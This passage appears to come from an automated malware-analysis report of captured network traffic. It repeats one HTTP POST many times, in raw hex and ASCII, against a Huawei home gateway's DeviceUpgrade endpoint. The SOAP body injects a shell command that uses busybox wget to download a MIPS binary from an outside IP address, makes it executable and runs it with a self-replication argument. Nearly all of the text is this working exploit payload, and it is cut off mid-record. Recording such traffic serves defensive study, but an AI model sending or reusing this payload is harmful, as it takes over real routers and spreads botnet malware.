3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 